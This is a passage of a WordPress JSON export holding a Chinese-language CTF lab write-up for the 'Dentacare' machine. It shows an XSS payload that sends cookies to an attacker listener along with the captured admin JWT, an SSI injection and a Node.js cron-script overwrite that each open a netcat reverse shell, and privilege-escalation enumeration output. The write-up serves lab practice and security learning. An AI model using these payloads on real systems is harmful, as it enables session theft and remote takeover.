src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528193550258\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5<a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/xss-cross-site-scripting#retrieve-cookies\">\u7a83\u53d6cookie<\/a>\uff1a<\/p>\n<pre><code class=\"language-bash\">&lt;img src=x onerror=this.src=&quot;http:\/\/172.20.10.8:8888\/?c=&quot;+document.cookie&gt;<\/code><\/pre>\n<p>\u7136\u540e\u63a5\u6536\uff0c\u8010\u5fc3\u7b49\u5f85\u4e00\u4f1a\u5373\u53ef\u6536\u5230\uff1a<\/p>\n<pre><code 
class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/dentacare]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n172.20.10.4 - - [28\/May\/2024 07:50:03] &quot;GET \/?c=Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJEZW50YUNhcmUgQ29ycG9yYXRpb24gIiwiaWF0IjoxNzEyNTc0NTEyLCJleHAiOjE3NDQxMTA1MTIsImF1ZCI6ImRlbnRhY2FyZS5obXYiLCJzdWIiOiJoZWxwZGVza0BkZW50YWNhcmUuaG12IiwiR2l2ZW5OYW1lIjoiUGF0cmljayIsIlN1cm5hbWUiOiJQZXRpdCIsIkVtYWlsIjoiYWRtaW5AZGVudGFjYXJlLmhtdiIsIlJvbGUiOlsiQWRtaW5pc3RyYXRvciIsIlByb2plY3QgQWRtaW5pc3RyYXRvciJdfQ.FIMxmUCOL3a4ThN5z-7VDN8OxBK7W0krHlcVktAiZtx3KXSQsbno1q1MRUL9JMPTJeqoTr-bRL2KWyr5Kv7JnQ HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<h3>\u66ff\u6362cookie\u767b\u5f55<\/h3>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u66ff\u6362<code>cookie<\/code>\u767b\u5f55\u4e4b\u524d\u90a3\u4e2a<code>8000<\/code>\u7aef\u53e3\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101692.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101692.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528195456197\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u53cd\u5f39shell<\/h3>\n<p>\u5148\u8bd5\u63a2\u4e00\u4e0b\u8fd9\u4e2a\u73a9\u610f\u662f\u5426\u53ef\u4ee5\u6267\u884c\u547d\u4ee4\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101693.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101693.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528195626967\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101694.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101694.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528200104764\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u6587\u4ef6\u683c\u5f0f\u4e3a<code>shtml<\/code>\uff0c\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101695.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  
decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101695.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528200215774\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u7ee7\u7eed\u67e5\u770b\uff1a<a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/server-side-inclusion-edge-side-inclusion-injection#server-side-inclusion-basic-information\">https:\/\/book.hacktricks.xyz\/pentesting-web\/server-side-inclusion-edge-side-inclusion-injection#server-side-inclusion-basic-information<\/a><\/p>\n<p>\u53d1\u73b0\u5b58\u5728\u53cd\u5f39shell\u65b9\u6cd5\uff1a<\/p>\n<pre><code>&lt;!--#exec cmd=&quot;mkfifo \/tmp\/foo;nc 172.20.10.8 1234 0&lt;\/tmp\/foo|\/bin\/bash 1&gt;\/tmp\/foo;rm \/tmp\/foo&quot; --&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101696.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101696.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528200729844\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5f39\u8fc7\u6765\u4e86\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101697.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101697.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528200745635\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@dentacare:\/var\/www\/html$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@dentacare:\/var\/www\/html$ ls -la\ntotal 28\ndrwxr-xr-x 2 www-data www-data 4096 Apr 14 08:02 .\ndrwxr-xr-x 3 root     root     4096 Apr  9 19:08 ..\n-rw-r--r-- 1 root     root      537 Apr 14 08:01 .htaccess\n-rw-r--r-- 1 www-data www-data  268 Apr 12 20:04 gen.php\n-rw-r--r-- 1 www-data www-data  347 Apr 12 20:04 index.shtml\n-rw-r--r-- 1 www-data www-data  183 May 28 14:07 patient_name.shtml\n-rw-r--r-- 1 www-data www-data   95 Apr 12 20:04 process.php\n(remote) www-data@dentacare:\/var\/www\/html$ cat gen.php \n&lt;?php\n\n$userCommand = $_GET[&#039;cmd&#039;] ?? &#039;echo Pas de commande sp\u00e9cifi\u00e9e&#039;;\n\nfile_put_contents(&#039;patient_name.shtml&#039;, &quot;&lt;html&gt;&lt;body&gt;&lt;h1&gt;Patient with unpaid balance added to database :&lt;\/h1&gt;\\&quot;$userCommand\\&quot;&lt;\/body&gt;&lt;\/html&gt;&quot;);\n\nheader(&quot;Location: patient_name.shtml&quot;);\nexit;\n?&gt;\n(remote) www-data@dentacare:\/var\/www\/html$ cat process.php \n&lt;?php\n$userInput = $_GET[&#039;query&#039;] ?? 
&#039;&#039;;\n\nheader(&quot;Location: hello.shtml?$userInput&quot;);\nexit;\n?&gt;\n(remote) www-data@dentacare:\/var\/www\/html$ sudo -l\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@dentacare:\/var\/www\/html$ crontab -l\nno crontab for www-data\n(remote) www-data@dentacare:\/var\/www\/html$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\ndentist:x:1000:1000:,,,:\/home\/dentist:\/bin\/bash\n(remote) www-data@dentacare:\/var\/www\/html$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: 
Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily; }\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly; }\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly; }\n#\n(remote) www-data@dentacare:\/var\/www\/html$ cd \/home\/dentist\/\nbash: cd: \/home\/dentist\/: Permission denied\n(remote) www-data@dentacare:\/var\/www\/html$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/passwd\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/lib\/authbind\/helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n(remote) www-data@dentacare:\/var\/www\/html$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7529<code>linpeas.sh<\/code>\u8fdb\u53bb\u4ee5\u53ca<code>pspy64<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' 
data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101698.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101698.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528202035848\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p><code>pspy64<\/code>\u4e00\u76f4\u51fa\u9519\uff0c\u53ea\u80fd\u624b\u52a8\u67e5\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101699.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101699.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528203125629\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5b58\u5728\u5b9a\u65f6\u4efb\u52a1\uff0c\u4e14\u5176\u6267\u884c\u7684\u811a\u672c\u5c5e\u4e3b\u4e3a www-data\u3001\u5177\u6709\u5199\u6743\u9650\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@dentacare:\/tmp$ ls -l \/opt\/appli\/.config\/read_comment.js\n-rw-r--r-- 1 www-data www-data 1063 Apr 12 20:04 \/opt\/appli\/.config\/read_comment.js<\/code><\/pre>\n<p>\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\n<pre><code 
class=\"language-bash\">require(&#039;child_process&#039;).exec(&#039;nc -e \/bin\/bash 192.168.0.143 1234&#039;)<\/code><\/pre>\n<pre><code class=\"language-bash\">(remote) www-data@dentacare:\/tmp$ cd \/opt\/appli\/.config\/\n(remote) www-data@dentacare:\/opt\/appli\/.config$ cat read_comment.js \nconst puppeteer = require(&#039;puppeteer&#039;);\n\n(async () =&gt; {\n    const browser = await puppeteer.launch({\n        headless: true,\n        args: [&#039;--no-sandbox&#039;, &#039;--disable-setuid-sandbox&#039;]\n    });\n    const page = await browser.newPage();\n\n    const cookies = [{\n        &#039;name&#039;: &#039;Authorization&#039;,\n        &#039;value&#039;: &#039;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJEZW50YUNhcmUgQ29ycG9yYXRpb24gIiwiaWF0IjoxNzEyNTc0NTEyLCJleHAiOjE3NDQxMTA1MTIsImF1ZCI6ImRlbnRhY2FyZS5obXYiLCJzdWIiOiJoZWxwZGVza0BkZW50YWNhcmUuaG12IiwiR2l2ZW5OYW1lIjoiUGF0cmljayIsIlN1cm5hbWUiOiJQZXRpdCIsIkVtYWlsIjoiYWRtaW5AZGVudGFjYXJlLmhtdiIsIlJvbGUiOlsiQWRtaW5pc3RyYXRvciIsIlByb2plY3QgQWRtaW5pc3RyYXRvciJdfQ.FIMxmUCOL3a4ThN5z-7VDN8OxBK7W0krHlcVktAiZtx3KXSQsbno1q1MRUL9JMPTJeqoTr-bRL2KWyr5Kv7JnQ&#039;,\n        &#039;url&#039;: &#039;http:\/\/localhost:80&#039;\n    }];\n\n    await page.setCookie(...cookies);\n\n    await page.goto(&#039;http:\/\/localhost:80\/view-all-comments&#039;);\n\n    console.log(`Page visit\u00e9e avec cookie sp\u00e9cifi\u00e9 \u00e0 ${new Date().toISOString()}`);\n\n    await page.waitForTimeout(10000);\n\n    await browser.close();\n})();\n(remote) www-data@dentacare:\/opt\/appli\/.config$ cp read_comment.js read_comment.js.bak\n(remote) www-data@dentacare:\/opt\/appli\/.config$ echo &#039;require(&quot;child_process&quot;).exec(&quot;nc -e \/bin\/bash 172.20.10.8 2345&quot;)&#039; &gt; read_comment.js<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101700.png'><img class=\"lazyload 
lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101700.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528204229504\" \/><\/div><\/p>\n<p>\u5f39\u56de\u6765\u4e86\uff01\u8fd9\u548c\u4f5c\u8005\u7684\u505a\u6cd5\u622a\u7136\u4e0d\u540c\uff0c\u66f4\u7406\u60f3\u7684\u89e3\u6cd5\u53ef\u53c2\u8003\u4f5c\u8005\u7684wp\uff0c\u5373\u4e0b\u9762\u53c2\u8003\u4e2d\u7684\u7b2c\u4e00\u4e2a\u94fe\u63a5\u3002<\/p>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=PPJOF-89KLQ\">https:\/\/www.youtube.com\/watch?v=PPJOF-89KLQ<\/a><\/p>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1Ti421S7tt\/\">https:\/\/www.bilibili.com\/video\/BV1Ti421S7tt\/<\/a><\/p>\n<p><a href=\"http:\/\/162.14.82.114\/index.php\/471\/03\/28\/2024\/\">http:\/\/162.14.82.114\/index.php\/471\/03\/28\/2024\/<\/a><\/p>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/werkzeug\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/werkzeug<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dentacare \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/dentacare] \u2514 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-685","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/685","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=685"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/685\/revisions"}],"predecessor-version":[{"id":686,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/685\/revisions\/686"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=685"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=685"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=685"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}